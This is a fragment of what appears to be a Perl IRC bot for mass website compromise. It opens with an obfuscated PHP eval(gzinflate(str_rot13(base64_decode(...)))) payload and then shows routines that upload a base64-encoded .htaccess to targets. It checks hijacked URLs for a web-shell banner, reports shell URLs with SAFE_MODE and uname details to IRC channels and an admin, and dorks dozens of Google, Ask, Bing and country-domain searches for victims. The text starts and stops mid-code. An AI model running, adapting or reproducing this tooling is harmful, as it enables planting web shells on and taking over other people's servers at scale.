eval(gzinflate(str_rot13(base64_decode('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')))); ?> "; my $res = $ua->request(POST $url,Content_Type => 'text/plain', Content => $data); print $res->as_string(); } sub jg_ht(){ my $url = $_[0]; my $ua = LWP::UserAgent->new; $dataku = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfHBocDV8cGhwNHxwaHRtbHxnaWZ8cGhwZ2lmfHBIcCkkIj4NCmRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+DQo8RmlsZXMgbWFnaWMuKj4NCk9yZGVyIEFsbG93LERlbnkNCkFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzIHhtbC4qPg0KT3JkZXIgQWxsb3csRGVueQ0KQWxsb3cgZnJvbSBhbGwNCjwvRmlsZXM+"; $inidataku = base64_decode($dataku); $data = "$inidataku"; my $res = $ua->request(POST $url,Content_Type => 'text/plain', Content => $data); print $res->as_string(); } ################################################################################## sub os() { my $url = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $logo = $_[3]; my $nick = $_[4]; my @print; my $target = &get_content($url); if ($target =~ /BArNEr/i) { my $safe = ""; my $os = ""; if ($target =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($target =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$chan","$logo4,1target sent to 0,1$nick 4,1$safe $os"); &msg("$nick","$logo4,1$engine 12sHeLL0,1 ".$url." 4,1$safe $os"); &msg("$inject","$logo4,1$engine 12sHeLL0,1 ".$url." 4,1$safe $os"); &msg("$admin","$logo4,1$engine 0,1sHeLL4 ".$url." 4,1$safe $os"); } return @print; } sub os2() { my $url = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $logo = $_[3]; my $nick = $_[4]; my @print; my $target = &get_content($url); if ($target =~ /BArNEr/i) { my $safe = ""; my $os = ""; if ($target =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($target =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$chan","$logo4,1target sent to 0,1$nick 4,1$safe $os"); &msg("$nick","$logo4,1$engine 0,1sHeLL4 ".$url." 4,1$safe $os"); &msg("$inject","$logo4,1$engine 0,1sHeLL4 ".$url." 4,1$safe $os"); &msg("$admin","$logo4,1$engine 0,1sHeLL4 ".$url." 4,1$safe $os"); &msg("$chanxxx","$logo4,1$engine 0,1sHeLL4 ".$url." 4,1$safe $os"); } return @print; } sub os3() { my $url = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $logo = $_[3]; my $nick = $_[4]; my @print; my $target = &get_content($url); if ($target =~ /BArNEr/i) { my $safe = ""; my $os = ""; if ($target =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($target =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$chan","$logo4,1target sent to 0,1$nick 14$safe $os"); &msg("$nick","$logo4,1$engine 0,1sHeLL4,1 ".$url." 0,1$safe $os"); &msg("$inject","$logo4,1$engine 0,1sHeLL4,1 ".$url." 0,1$safe $os"); &msg("$admin","$logo4,1$engine 0,1sHeLL4,1 ".$url." 0,1$safe $os"); &msg("$chanxxx","$logo4,1$engine 0,1sHeLL4,1 ".$url." 0,1$safe $os"); } return @print; } ################################################################################## sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $logo = $_[4]; if ($engine eq "GooGLeCA") { my @googleCA = googleCA($dork); push(@total,@googleCA); } if ($engine eq "GooGLeDE") { my @googleDE = googleDE($dork); push(@total,@googleDE); } if ($engine eq "GooGLeUK") { my @googleUK = googleUK($dork); push(@total,@googleUK); } if ($engine eq "GooGLeFR") { my @googleFR = googleFR($dork); push(@total,@googleFR); } if ($engine eq "GooGLeES") { my @googleES = googleES($dork); push(@total,@googleES); } if ($engine eq "GooGLeIT") { my @googleIT = googleIT($dork); push(@total,@googleIT); } if ($engine eq "GooGLeNL") { my @googleNL = googleNL($dork); push(@total,@googleNL); } if ($engine eq "GooGLeBE") { my @googleBE = googleBE($dork); push(@total,@googleBE); } if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@total,@googleCH); } if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); } if ($engine eq "GooGLeDK") { my @googleDK = googleDK($dork); push(@total,@googleDK); } if ($engine eq "GooGLeNO") { my @googleNO = googleNO($dork); push(@total,@googleNO); } if ($engine eq "GooGLeNZ") { my @googleNZ = googleNZ($dork); push(@total,@googleNZ); } if ($engine eq "GooGLeIE") { my @googleIE = googleIE($dork); push(@total,@googleIE); } if ($engine eq "GooGLeBR") { my @googleBR = googleBR($dork); push(@total,@googleBR); } if ($engine eq "GooGLeAR") { my @googleAR = googleAR($dork); push(@total,@googleAR); } if ($engine eq "GooGLeCO") { my @googleCO = googleCO($dork); push(@total,@googleCO); } if ($engine eq "GooGLeCU") { my @googleCU = googleCU($dork); push(@total,@googleCU); } if ($engine eq "GooGLeCL") { my @googleCL = googleCL($dork); push(@total,@googleCL); } if ($engine eq "GooGLeMX") { my @googleMX = googleMX($dork); push(@total,@googleMX); } if ($engine eq "GooGLeAU") { my @googleAU = googleAU($dork); push(@total,@googleAU); } if ($engine eq "GooGLeRU") { my @googleRU = googleRU($dork); push(@total,@googleRU); } if ($engine eq "GooGLeAT") { my @googleAT = googleAT($dork); push(@total,@googleAT); } if ($engine eq "GooGLePL") { my @googlePL = googlePL($dork); push(@total,@googlePL); } if ($engine eq "GooGLeIL") { my @googleIL = googleIL($dork); push(@total,@googleIL); } if ($engine eq "GooGLeTR") { my @googleTR = googleTR($dork); push(@total,@googleTR); } if ($engine eq "GooGLeUA") { my @googleUA = googleUA($dork); push(@total,@googleUA); } if ($engine eq "GooGLeGR") { my @googleGR = googleGR($dork); push(@total,@googleGR); } if ($engine eq "GooGLeJP") { my @googleJP = googleJP($dork); push(@total,@googleJP); } if ($engine eq "GooGLeCN") { my @googleCN = googleCN($dork); push(@total,@googleCN); } if ($engine eq "GooGLeMY") { my @googleMY = googleMY($dork); push(@total,@googleMY); } if ($engine eq "GooGLeTH") { my @googleTH = googleTH($dork); push(@total,@googleTH); } if ($engine eq "GooGLeIN") { my @googleIN = googleIN($dork); push(@total,@googleIN); } if ($engine eq "GooGLeKR") { my @googleKR = googleKR($dork); push(@total,@googleKR); } if ($engine eq "GooGLeRO") { my @googleRO = googleRO($dork); push(@total,@googleRO); } if ($engine eq "GooGLeTW") { my @googleTW = googleTW($dork); push(@total,@googleTW); } if ($engine eq "GooGLeZA") { my @googleZA = googleZA($dork); push(@total,@googleZA); } if ($engine eq "GooGLePT") { my @googlePT = googlePT($dork); push(@total,@googlePT); } if ($engine eq "AsKCA") { my @askCA = askCA($dork); push(@total,@askCA); } if ($engine eq "AsKDE") { my @askDE = askDE($dork); push(@total,@askDE); } if ($engine eq "AsKIT") { my @askIT = askIT($dork); push(@total,@askIT); } if ($engine eq "AsKUK") { my @askUK = askUK($dork); push(@total,@askUK); } if ($engine eq "AsKFR") { my @askFR = askFR($dork); push(@total,@askFR); } if ($engine eq "AsKES") { my @askES = askES($dork); push(@total,@askES); } if ($engine eq "AsKRU") { my @askRU = askRU($dork); push(@total,@askRU); } if ($engine eq "AsKNL") { my @askNL = askNL($dork); push(@total,@askNL); } if ($engine eq "AsKEU") { my @askEU = askEU($dork); push(@total,@askEU); } if ($engine eq "AsKPL") { my @askPL = askPL($dork); push(@total,@askPL); } if ($engine eq "AsKAT") { my @askAT = askAT($dork); push(@total,@askAT); } if ($engine eq "AsKSE") { my @askSE = askSE($dork); push(@total,@askSE); } if ($engine eq "AsKDK") { my @askDK = askDK($dork); push(@total,@askDK); } if ($engine eq "AsKNO") { my @askNO = askNO($dork); push(@total,@askNO); } if ($engine eq "AsKAU") { my @askAU = askAU($dork); push(@total,@askAU); } if ($engine eq "AsKBR") { my @askBR = askBR($dork); push(@total,@askBR); } if ($engine eq "AsKMX") { my @askMX = askMX($dork); push(@total,@askMX); } if ($engine eq "AsKJP") { my @askJP = askJP($dork); push(@total,@askJP); } if ($engine eq "BingDE") { my @bingDE = bingDE($dork); push(@total,@bingDE); } if ($engine eq "BingUK") { my @bingUK = bingUK($dork); push(@total,@bingUK); } if ($engine eq "BingCA") { my @bingCA = bingCA($dork); push(@total,@bingCA); } if ($engine eq "BingBR") { my @bingBR = bingBR($dork); push(@total,@bingBR); } if ($engine eq "BingFR") { my @bingFR = bingFR($dork); push(@total,@bingFR); } if ($engine eq "BingES") { my @bingES = bingES($dork); push(@total,@bingES); } if ($engine eq "BingIT") { my @bingIT = bingIT($dork); push(@total,@bingIT); } if ($engine eq "BingBE") { my @bingBE = bingBE($dork); push(@total,@bingBE); } if ($engine eq "BingNL") { my @bingNL = bingNL($dork); push(@total,@bingNL); } if ($engine eq "BingPT") { my @bingPT = bingPT($dork); push(@total,@bingPT); } if ($engine eq "BingNO") { my @bingNO = bingNO($dork); push(@total,@bingNO); } if ($engine eq "BingDK") { my @bingDK = bingDK($dork); push(@total,@bingDK); } if ($engine eq "BingSE") { my @bingSE = bingSE($dork); push(@total,@bingSE); } if ($engine eq "BingCH") { my @bingCH = bingCH($dork); push(@total,@bingCH); } if ($engine eq "BingNZ") { my @bingNZ = bingNZ($dork); push(@total,@bingNZ); } if ($engine eq "BingRU") { my @bingRU = bingRU($dork); push(@total,@bingRU); } if ($engine eq "BingJP") { my @bingJP = bingJP($dork); push(@total,@bingJP); } if ($engine eq "BingCN") { my @bingCN = bingCN($dork); push(@total,@bingCN); } if ($engine eq "BingKR") { my @bingKR = bingKR($dork); push(@total,@bingKR); } if ($engine eq "BingMX") { my @bingMX = bingMX($dork); push(@total,@bingMX); } if ($engine eq "BingAR") { my @bingAR = bingAR($dork); push(@total,@bingAR); } if ($engine eq "BingCL") { my @bingCL = bingCL($dork); push(@total,@bingCL); } if ($engine eq "BingAU") { my @bingAU = bingAU($dork); push(@total,@bingAU); } if ($engine eq "AE") { my @ae = &jack1($dork."+site:ae"); push(@total,@ae); } if ($engine eq "AR") { my @ar = &jack2($dork."+site:ar"); push(@total,@ar); } if ($engine eq "AT") { my @at = &jack3($dork."+site:at"); push(@total,@at); } if ($engine eq "AU") { my @au = &jack4($dork."+site:au"); push(@total,@au); } if ($engine eq "BR") { my @br = &jack5($dork."+site:br"); push(@total,@br); } if ($engine eq "CA") { my @ca = &jack6($dork."+site:ca"); push(@total,@ca); } if ($engine eq "CL") { my @cl = &jack7($dork."+site:cl"); push(@total,@cl); } if ($engine eq "CN") { my @cn = &jack8($dork."+site:cn"); push(@total,@cn); } if ($engine eq "CoM") { my @com = &jack9($dork."+site:com"); push(@total,@com); } if ($engine eq "CZ") { my @cz = &jack10($dork."+site:cz"); push(@total,@cz); } if ($engine eq "DE") { my @de = &jack1($dork."+site:de"); push(@total,@de); } if ($engine eq "DK") { my @dk = &jack2($dork."+site:dk"); push(@total,@dk); } if ($engine eq "ES") { my @es = &jack3($dork."+site:es"); push(@total,@es); } if ($engine eq "EU") { my @eu = &jack4($dork."+site:eu"); push(@total,@eu); } if ($engine eq "FR") { my @fr = &jack5($dork."+site:fr"); push(@total,@fr); } if ($engine eq "HU") { my @hu = &jack6($dork."+site:hu"); push(@total,@hu); } if ($engine eq "ID") { my @id = &jack7($dork."+site:id"); push(@total,@id); } if ($engine eq "IL") { my @il = &jack8($dork."+site:il"); push(@total,@il); } if ($engine eq "IN") { my @in = &jack9($dork."+site:in"); push(@total,@in); } if ($engine eq "InfO") { my @info = &jack10($dork."+site:info"); push(@total,@info); } if ($engine eq "IR") { my @ir = &jack1($dork."+site:ir"); push(@total,@ir); } if ($engine eq "IT") { my @it = &jack2($dork."+site:it"); push(@total,@it); } if ($engine eq "JP") { my @jp = &jack3($dork."+site:jp"); push(@total,@jp); } if ($engine eq "KR") { my @kr = &jack4($dork."+site:kr"); push(@total,@kr); } if ($engine eq "MX") { my @mx = &jack5($dork."+site:mx"); push(@total,@mx); } if ($engine eq "MY") { my @my = &jack6($dork."+site:my"); push(@total,@my); } if ($engine eq "NeT") { my @net = &jack7($dork."+site:net"); push(@total,@net); } if ($engine eq "NL") { my @nl = &jack8($dork."+site:nl"); push(@total,@nl); } if ($engine eq "OrG") { my @org = &jack9($dork."+site:org"); push(@total,@org); } if ($engine eq "PH") { my @ph = &jack10($dork."+site:ph"); push(@total,@ph); } if ($engine eq "PL") { my @pl = &jack1($dork."+site:pl"); push(@total,@pl); } if ($engine eq "RO") { my @ro = &jack2($dork."+site:ro"); push(@total,@ro); } if ($engine eq "RU") { my @ru = &jack3($dork."+site:ru"); push(@total,@ru); } if ($engine eq "TH") { my @th = &jack4($dork."+site:th"); push(@total,@th); } if ($engine eq "UA") { my @ua = &jack5($dork."+site:ua"); push(@total,@ua); } if ($engine eq "UK") { my @uk = &jack6($dork."+site:uk"); push(@total,@uk); } if ($engine eq "US") { my @us = &jack7($dork."+site:us"); push(@total,@us); } if ($engine eq "SI") { my @si = &jack8($dork."+site:si"); push(@total,@si); } if ($engine eq "BE") { my @be = &jack9($dork."+site:be"); push(@total,@be); } if ($engine eq "BIZ") { my @biz = &jack10($dork."+site:biz"); push(@total,@biz); } if ($engine eq "XXX") { my @xxx = &jack1($dork."+site:xxx"); push(@total,@xxx); } if ($engine eq "TEL") { my @tel = &jack2($dork."+site:tel"); push(@total,@tel); } if ($engine eq "TV") { my @tv = &jack3($dork."+site:tv"); push(@total,@tv); } if ($engine eq "CC") { my @cc = &jack4($dork."+site:cc"); push(@total,@cc); } if ($engine eq "MIL") { my @mil = &jack5($dork."+site:mil"); push(@total,@mil); } if ($engine eq "ASIA") { my @asia = &jack6($dork."+site:asia"); push(@total,@asia); } if ($engine eq "NAME") { my @name = &jack7($dork."+site:name"); push(@total,@name); } if ($engine eq "PRO") { my @pro = &jack8($dork."+site:pro"); push(@total,@pro); } if ($engine eq "TRAVEL") { my @travel = &jack9($dork."+site:travel"); push(@total,@travel); } if ($engine eq "JOBS") { my @jobs = &jack10($dork."+site:jobs"); push(@total,@jobs); } if ($engine eq "MOBI") { my @mobi = &jack1($dork."+site:mobi"); push(@total,@mobi); } if ($engine eq "AERO") { my @aero = &jack2($dork."+site:aero"); push(@total,@aero); } if ($engine eq "CAT") { my @cat = &jack3($dork."+site:cat"); push(@total,@cat); } if ($engine eq "COOP") { my @coop = &jack4($dork."+site:coop"); push(@total,@coop); } if ($engine eq "EDU") { my @edu = &jack5($dork."+site:edu"); push(@total,@edu); } if ($engine eq "GOV") { my @gov = &jack6($dork."+site:gov"); push(@total,@gov); } if ($engine eq "AS") { my @as = &jack7($dork."+site:as"); push(@total,@as); } if ($engine eq "AI") { my @ai = &jack8($dork."+site:ai"); push(@total,@ai); } if ($engine eq "AG") { my @ag = &jack9($dork."+site:ag"); push(@total,@ag); } if ($engine eq "AZ") { my @az = &jack10($dork."+site:az"); push(@total,@az); } if ($engine eq "BH") { my @bh = &jack1($dork."+site:bh"); push(@total,@bh); } if ($engine eq "BD") { my @bd = &jack2($dork."+site:bd"); push(@total,@bd); } if ($engine eq "BZ") { my @bz = &jack3($dork."+site:bz"); push(@total,@bz); } if ($engine eq "BO") { my @bo = &jack4($dork."+site:bo"); push(@total,@bo); } if ($engine eq "BA") { my @ba = &jack5($dork."+site:ba"); push(@total,@ba); } if ($engine eq "VG") { my @vg = &jack7($dork."+site:vg"); push(@total,@vg); } if ($engine eq "BG") { my @bg = &jack8($dork."+site:bg"); push(@total,@bg); } if ($engine eq "BI") { my @bi = &jack9($dork."+site:bi"); push(@total,@bi); } if ($engine eq "CO") { my @co = &jack10($dork."+site:co"); push(@total,@co); } if ($engine eq "CD") { my @cd = &jack1($dork."+site:cd"); push(@total,@cd); } if ($engine eq "CG") { my @cg = &jack2($dork."+site:cg"); push(@total,@cg); } if ($engine eq "CK") { my @ck = &jack3($dork."+site:ck"); push(@total,@ck); } if ($engine eq "CR") { my @cr = &jack4($dork."+site:cr"); push(@total,@cr); } if ($engine eq "HR") { my @hr = &jack5($dork."+site:hr"); push(@total,@hr); } if ($engine eq "CU") { my @cu = &jack6($dork."+site:cu"); push(@total,@cu); } if ($engine eq "CI") { my @ci = &jack7($dork."+site:ci"); push(@total,@ci); } if ($engine eq "DJ") { my @dj = &jack8($dork."+site:dj"); push(@total,@dj); } if ($engine eq "DM") { my @dm = &jack9($dork."+site:dm"); push(@total,@dm); } if ($engine eq "DO") { my @do = &jack10($dork."+site:do"); push(@total,@do); } if ($engine eq "EC") { my @ec = &jack1($dork."+site:ec"); push(@total,@ec); } if ($engine eq "EG") { my @eg = &jack2($dork."+site:eg"); push(@total,@eg); } if ($engine eq "SV") { my @sv = &jack3($dork."+site:sv"); push(@total,@sv); } if ($engine eq "EE") { my @ee = &jack4($dork."+site:ee"); push(@total,@ee); } if ($engine eq "ET") { my @et = &jack5($dork."+site:et"); push(@total,@et); } if ($engine eq "FJ") { my @fj = &jack6($dork."+site:fj"); push(@total,@fj); } if ($engine eq "FI") { my @fi = &jack7($dork."+site:fi"); push(@total,@fi); } if ($engine eq "GM") { my @gm = &jack8($dork."+site:gm"); push(@total,@gm); } if ($engine eq "GI") { my @gi = &jack9($dork."+site:gi"); push(@total,@gi); } if ($engine eq "GR") { my @gr = &jack10($dork."+site:gr"); push(@total,@gr); } if ($engine eq "GL") { my @gl = &jack1($dork."+site:gl"); push(@total,@gl); } if ($engine eq "GT") { my @gt = &jack2($dork."+site:gt"); push(@total,@gt); } if ($engine eq "GG") { my @gg = &jack3($dork."+site:gg"); push(@total,@gg); } if ($engine eq "HT") { my @ht = &jack4($dork."+site:ht"); push(@total,@ht); } if ($engine eq "HN") { my @hn = &jack5($dork."+site:hn"); push(@total,@hn); } if ($engine eq "HK") { my @hk = &jack6($dork."+site:hk"); push(@total,@hk); } if ($engine eq "IS") { my @is = &jack7($dork."+site:is"); push(@total,@is); } if ($engine eq "IE") { my @ie = &jack8($dork."+site:ie"); push(@total,@ie); } if ($engine eq "IM") { my @im = &jack9($dork."+site:im"); push(@total,@im); } if ($engine eq "JE") { my @je = &jack10($dork."+site:je"); push(@total,@je); } if ($engine eq "JO") { my @jo = &jack1($dork."+site:jo"); push(@total,@jo); } if ($engine eq "KZ") { my @kz = &jack2($dork."+site:kz"); push(@total,@kz); } if ($engine eq "KE") { my @ke = &jack3($dork."+site:ke"); push(@total,@ke); } if ($engine eq "KG") { my @kg = &jack4($dork."+site:kg"); push(@total,@kg); } if ($engine eq "LV") { my @lv = &jack5($dork."+site:lv"); push(@total,@lv); } if ($engine eq "LS") { my @ls = &jack6($dork."+site:ls"); push(@total,@ls); } if ($engine eq "LY") { my @ly = &jack7($dork."+site:ly"); push(@total,@ly); } if ($engine eq "LI") { my @li = &jack8($dork."+site:li"); push(@total,@li); } if ($engine eq "LT") { my @lt = &jack9($dork."+site:lt"); push(@total,@lt); } if ($engine eq "LU") { my @lu = &jack10($dork."+site:lu"); push(@total,@lu); } if ($engine eq "MW") { my @mw = &jack1($dork."+site:mw"); push(@total,@mw); } if ($engine eq "MT") { my @mt = &jack2($dork."+site:mt"); push(@total,@mt); } if ($engine eq "MU") { my @mu = &jack3($dork."+site:mu"); push(@total,@mu); } if ($engine eq "FM") { my @fm = &jack4($dork."+site:fm"); push(@total,@fm); } if ($engine eq "MN") { my @mn = &jack5($dork."+site:mn"); push(@total,@mn); } if ($engine eq "MS") { my @ms = &jack6($dork."+site:ms"); push(@total,@ms); } if ($engine eq "MA") { my @ma = &jack7($dork."+site:ma"); push(@total,@ma); } if ($engine eq "NA") { my @na = &jack8($dork."+site:na"); push(@total,@na); } if ($engine eq "NP") { my @np = &jack9($dork."+site:np"); push(@total,@np); } if ($engine eq "NZ") { my @nz = &jack10($dork."+site:nz"); push(@total,@nz); } if ($engine eq "NI") { my @ni = &jack1($dork."+site:ni"); push(@total,@ni); } if ($engine eq "NF") { my @nf = &jack2($dork."+site:nf"); push(@total,@nf); } if ($engine eq "NO") { my @no = &jack3($dork."+site:no"); push(@total,@no); } if ($engine eq "OM") { my @om = &jack4($dork."+site:om"); push(@total,@om); } if ($engine eq "PK") { my @pk = &jack5($dork."+site:pk"); push(@total,@pk); } if ($engine eq "PA") { my @pa = &jack6($dork."+site:pa"); push(@total,@pa); } if ($engine eq "PY") { my @py = &jack7($dork."+site:py"); push(@total,@py); } if ($engine eq "PE") { my @pe = &jack8($dork."+site:pe"); push(@total,@pe); } if ($engine eq "PN") { my @pn = &jack9($dork."+site:pn"); push(@total,@pn); } if ($engine eq "PT") { my @pt = &jack10($dork."+site:pt"); push(@total,@pt); } if ($engine eq "PR") { my @pr = &jack1($dork."+site:pr"); push(@total,@pr); } if ($engine eq "QA") { my @qa = &jack2($dork."+site:qa"); push(@total,@qa); } if ($engine eq "RW") { my @rw = &jack3($dork."+site:rw"); push(@total,@rw); } if ($engine eq "SH") { my @sh = &jack4($dork."+site:sh"); push(@total,@sh); } if ($engine eq "SM") { my @sm = &jack5($dork."+site:sm"); push(@total,@sm); } if ($engine eq "SA") { my @sa = &jack6($dork."+site:sa"); push(@total,@sa); } if ($engine eq "SN") { my @sn = &jack7($dork."+site:sn"); push(@total,@sn); } if ($engine eq "SC") { my @sc = &jack8($dork."+site:sc"); push(@total,@sc); } if ($engine eq "SG") { my @sg = &jack9($dork."+site:sg"); push(@total,@sg); } if ($engine eq "SK") { my @sk = &jack10($dork."+site:sk"); push(@total,@sk); } if ($engine eq "ZA") { my @za = &jack1($dork."+site:za"); push(@total,@za); } if ($engine eq "LK") { my @lk = &jack2($dork."+site:lk"); push(@total,@lk); } if ($engine eq "VC") { my @vc = &jack3($dork."+site:vc"); push(@total,@vc); } if ($engine eq "SE") { my @se = &jack4($dork."+site:se"); push(@total,@se); } if ($engine eq "CH") { my @ch = &jack5($dork."+site:ch"); push(@total,@ch); } if ($engine eq "TW") { my @tw = &jack6($dork."+site:tw"); push(@total,@tw); } if ($engine eq "TJ") { my @tj = &jack7($dork."+site:tj"); push(@total,@tj); } if ($engine eq "BS") { my @bs = &jack8($dork."+site:bs"); push(@total,@bs); } if ($engine eq "TO") { my @to = &jack9($dork."+site:to"); push(@total,@to); } if ($engine eq "TT") { my @tt = &jack10($dork."+site:tt"); push(@total,@tt); } if ($engine eq "TR") { my @tr = &jack1($dork."+site:tr"); push(@total,@tr); } if ($engine eq "TM") { my @tm = &jack2($dork."+site:tm"); push(@total,@tm); } if ($engine eq "VI") { my @vi = &jack3($dork."+site:vi"); push(@total,@vi); } if ($engine eq "UG") { my @ug = &jack4($dork."+site:ug"); push(@total,@ug); } if ($engine eq "UY") { my @uy = &jack5($dork."+site:uy"); push(@total,@uy); } if ($engine eq "UZ") { my @uz = &jack6($dork."+site:uz"); push(@total,@uz); } if ($engine eq "VE") { my @ve = &jack7($dork."+site:ve"); push(@total,@ve); } if ($engine eq "VN") { my @vn = &jack8($dork."+site:vn"); push(@total,@vn); } if ($engine eq "ZM") { my @zm = &jack9($dork."+site:zm"); push(@total,@zm); } if ($engine eq "ws") { my @ws = &jack10($dork."+site:ws"); push(@total,@ws); } if ($engine eq "af") { my @af = &jack1($dork."+site:af"); push(@total,@af); } if ($engine eq "ax") { my @ax = &jack2($dork."+site:ax"); push(@total,@ax); } if ($engine eq "al") { my @al = &jack3($dork."+site:al"); push(@total,@al); } if ($engine eq "dz") { my @dz = &jack4($dork."+site:dz"); push(@total,@dz); } if ($engine eq "ao") { my @ao = &jack5($dork."+site:ao"); push(@total,@ao); } if ($engine eq "aq") { my @aq = &jack6($dork."+site:aq"); push(@total,@aq); } if ($engine eq "am") { my @am = &jack7($dork."+site:am"); push(@total,@am); } if ($engine eq "aw") { my @aw = &jack8($dork."+site:aw"); push(@total,@aw); } if ($engine eq "ac") { my @ac = &jack9($dork."+site:ac"); push(@total,@ac); } if ($engine eq "bj") { my @bj = &jack10($dork."+site:bj"); push(@total,@bj); } if ($engine eq "bm") { my @bm = &jack1($dork."+site:bm"); push(@total,@bm); } if ($engine eq "bt") { my @bt = &jack2($dork."+site:bt"); push(@total,@bt); } if ($engine eq "bw") { my @bw = &jack3($dork."+site:bw"); push(@total,@bw); } if ($engine eq "io") { my @io = &jack4($dork."+site:io"); push(@total,@io); } if ($engine eq "bn") { my @bn = &jack5($dork."+site:bn"); push(@total,@bn); } if ($engine eq "bf") { my @bf = &jack6($dork."+site:bf"); push(@total,@bf); } if ($engine eq "kh") { my @kh = &jack7($dork."+site:kh"); push(@total,@kh); } if ($engine eq "cm") { my @cm = &jack8($dork."+site:cm"); push(@total,@cm); } if ($engine eq "cv") { my @cv = &jack9($dork."+site:cv"); 